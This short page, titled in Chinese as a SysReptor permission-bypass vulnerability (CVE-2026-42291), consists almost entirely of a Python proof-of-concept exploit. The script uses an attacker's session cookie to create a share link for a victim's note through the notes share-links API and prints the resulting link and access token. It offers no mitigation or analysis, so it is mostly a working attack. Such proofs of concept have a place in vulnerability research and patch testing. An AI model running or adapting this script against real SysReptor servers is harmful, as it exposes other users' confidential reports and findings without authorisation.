CVE-2026-42291 SysReptor权限绕过漏洞

import requests # Target configuration target_host = "https://sysreptor.example.com" victim_note_id = "uuid-of-victim-note" # The attacker needs to guess or obtain this ID attacker_session_cookie = "valid_attacker_session_token" # Vulnerable endpoint for creating sharing links url = f"{target_host}/api/notes/{victim_note_id}/share-links/" headers = { "Content-Type": "application/json", } cookies = { "sessionid": attacker_session_cookie } # Exploit: Send a POST request to create a share link for the victim's note try: response = requests.post(url, headers=headers, cookies=cookies) if response.status_code == 201: data = response.json() print(f"[+] Exploit Successful!") print(f"[+] Share Link Created: {data.get('url')}") print(f"[+] Access Token: {data.get('token')}") elif response.status_code == 200: # In some cases, listing might return existing links print(f"[+] Exploit Successful! Existing links listed.") print(response.json()) else: print(f"[-] Exploit Failed. Status Code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")